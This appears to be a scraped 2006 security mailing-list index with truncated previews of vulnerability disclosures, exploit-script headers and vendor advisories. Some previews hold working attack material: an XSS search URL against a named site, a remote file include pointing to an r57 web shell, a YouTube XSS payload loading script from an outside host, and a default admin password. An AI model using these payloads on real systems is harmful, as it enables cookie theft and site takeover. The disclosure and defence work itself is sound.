hi5.com

Homepage:

http://www.hi5.com

Affected files:

Input boxes of editing your profile.

XSS Vuln with cookie disclosure:

It seems hi5.com allows alot of html tags to be used on thier site but they will filter out words like javascript, applet, and iframe tags (which is to be expect

[ more ]  [ reply ]

Cybersocieties.com

Homepage:

http://www.cybersocieties.com

Effected files:

* Input boxes in profile:

- Full name box

- Occupation box

- MSN box

- Yahoo box

- AIM Box

* Viewing a profile

------------------------------------------------------

XSS vuln via input boxes in pro

[ more ]  [ reply ]

Apnaspace.com (A myspace type site for arab & indian teens)

Homepage:

http://www.http://www.apnaspace.com

Effected files:

* Comment input box:

* Posting a blog entry:

- Entry title

- Entry body

* Viewing a profile

* Posting a bulletin.

* Commenting on a picture

* Sending m

[ more ]  [ reply ]

use the searchbox with

"><script>alert('XSS')</script>

eg url:

http://search.gardenweb.com/search/nph-ind.cgi?term=%22%3E%3Cscript%3Eal
ert%28%27XSS%27%29%3C%2Fscript%3E

[ more ]  [ reply ]

Hotscripts.com

Homepage:

http://www.hotscripts.com

Effected files:

search input box

adding a review

Editing your profile

sending a author a message.

Creating a new listing

----------------------------------------

XSS vuln with cookie disclosure in search input box:

For a PoC try

[ more ]  [ reply ]

Cline Communications Sql injection

-------------------------------------

Site:http://www.celerondude.com/

Demo:http://www.liveelite.com/

---------------------------------

Sql injection

1,photo_enlarged.php file Photo_ID parameter

2,newsdetail.php file NID parameter

3,staff_photo_enlarged.

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n";

echo "disclosure exploit (benchmark() vesion)\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "this is called the Sun-Tzu

[ more ]  [ reply ]

____________________ ___ ___ ________

\_ _____/\_ ___ \ / | \\_____ \

| __)_ / \ \// ~ \/ | \

| \\ \___\ Y / | /_______ / \______ /\___|_ /\_______ /

\/ \/ \/ \/

.OR.ID

ECHO_ADV_33$2006

----

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "bitweaver <= v1.3 'tmpImagePath' attachment mod_mime exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "dork: \"powered by bitweaver\"\r\n\r\n";

if ($argc<4) {

echo "Usage: php ".$argv[0

[ more ]  [ reply ]

Darren Reed said:

> From my own mail archives, PHP appears to make up at least 4% of the
> email to bugtraq I see - or over 1000 issues since 1995, out of the
> 25,000 I have saved.

Do you mean the PHP interpreter? Or applications written in PHP?

I'm not sure how many vulnerabilities were in

[ more ]  [ reply ]

GreatDomains.com - XSS with cookie disclosure

----------------------------------------------

Type: Cross site scripting

Date: June, 16th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kur

[ more ]  [ reply ]

webcrawler.com - Cross site scripting vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Viei

[ more ]  [ reply ]

Netscape.com - Cross site scripting vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira

[ more ]  [ reply ]

Simple PHP Poll

http://www.cgixp.tk/

DESCRIPTION:

============

google dork = "Poewred By: Simple PHP Poll" and "Powered By: Simple PHP Poll"

administrator login path /poll_admin.php login to default admin pass "administrator" or add to ;

?action=edit&filename=question.txt(question

[ more ]  [ reply ]

Multiple file include exploits in dotwidgeta Version 2

script type : dotwidgeta Version 2
bug found by : sweet-devil
team : site-down
type : file include

####################################################
exploits :

index.php

http://www.example.com/path/index.php?file_path=http://yoursite/r57

[ more ]  [ reply ]

Housecarers.com

Homepage:

http://housecarers.com

Affected files:

* Posting a Housesit:

- City/Town box

- County/District box

- Suburb box

- City/Town Area box

* Searching for housesitters

* Sending messages to house sitters.

* Viewing member profiles

---------------------

[ more ]  [ reply ]

Dealgates.com

Homepage:

http://www.dealgates.com

Affected files:

*Input boxes when registering new account

* Search box

-------------------------------------

XSS vuln with cookie disclosure when registering a new account.

To bypass the adding backslashes to ; and ", we use the

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
This is Cisco PSIRT response to the statements made by Thomas
Liam Romanis of Fujitsu Services Limited in their posting to BugTraq on
the 15th June 2006, regarding Cisco Secure ACS LoginProxy.CGI Cross-Site
Scripting Vulnerability, located at
ht

[ more ]  [ reply ]

Youtube.com

Homepage:

http://www.youtube.com

Affected files:

* Search box input

* Adding a new blog:

- Blog name

XSS Vuln with cookie disclosure via search box:

Data isn't sanatized when using the search box. For PoC input:

<script src=http://www.youfucktard.com/xss.js></scrip

[ more ]  [ reply ]

The Exploit with Bugtraq ID: 17909 has been researched by the developers of the ISPConfig webhosting controlpanel. The result is that no ISPConfig 2.2.2 installation is vulnerable to this reported exploit.

Explanation:

1) The exploit expects a file (session.inc.php) to be in the webroot, but i

[ more ]  [ reply ]

Bingbox.com

Homepage:

http://www.bingbox.com

Affected files:

* Profile input boxes:

- City input

* Registering

* Viewing Birthdays

* Adding a friend

* Viewing people online

-----------------------------------------------

XSS with cookie disclosure via inviting friends:

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:106
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]

#!/usr/bin/perl

# Pico Zip v. 4.01 Long Filename Buffer Overflow

# Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded

# Author - c0rrupt

# Greets - sh0uts to n0limit, muts, and brax for the music ;)

#

# The vulnerability is caused due to a boundary error within th

[ more ]  [ reply ]

************************************************************************
**************************

PictureDis Products "lang" Parameter File Inclusion Vulnerability

=================================================

Input passed to the "lang" parameter in thumstbl.php, wpfiles.php,

and wallpa

[ more ]  [ reply ]